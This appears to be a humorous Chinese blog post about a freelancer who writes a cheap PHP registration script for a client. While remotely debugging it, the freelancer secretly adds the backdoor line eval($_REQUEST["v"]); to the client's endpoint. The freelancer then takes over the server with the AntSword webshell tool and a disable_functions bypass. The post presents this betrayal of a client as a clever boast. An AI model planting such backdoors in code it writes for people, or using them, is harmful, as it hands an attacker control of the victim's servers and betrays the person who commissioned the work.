顶级黑客：验证码发一下

开端

近日手头紧，遂想通过接单赚点钱，后找到了某二手交易平台，发布了代写shell、python、php等脚本的单子。

第二天，有人来问能否写php的注册接口。

我说：“能，你这接口是干什么的？”

他说：“注册用的，多少钱？”

我答道：“9.9。”

由于是第一次做单子，不了解行情，万一叫得太高价给别人吓跑了多不好，索性9.9（包邮）。

后面便是对接口需求，调试。后来，他说需要一个前端界面，于是我又给他加上了个前端界面，界面是用chatGPT生成的，虽然这一版不好看，但他说能用就行。调试了一番后就一手交钱一手交货了。

顺带提一嘴，chatGPT真好用，只要描述的够清楚，他就能做到多强大。

机缘

我以为这一单9.9就此了事，没成想他又找到了我。

他说：“我这里怎么总是说验证码错误？”

验证码错误？怎么会验证码错误？难道我写错了？我带着疑问打开了vscode，通读一遍都没发现错误，于是远程上他的电脑调试，后来发现是session问题，经过一番修改，我发现一件重要的事情：他不懂代码！他有两台服务器！其中一台在国外！

出手

于是，我在他的接口加了一句惊天地泣鬼神的 eval($_REQUEST["v"]); 。

然后拔出我的蚁剑，结果报了 ret=127，找到as_bypass_php_disable_functions插件，用 PHP Concat_UAF 模式绕过了。

总结

果然，最顶级的黑客只需要一个验证码！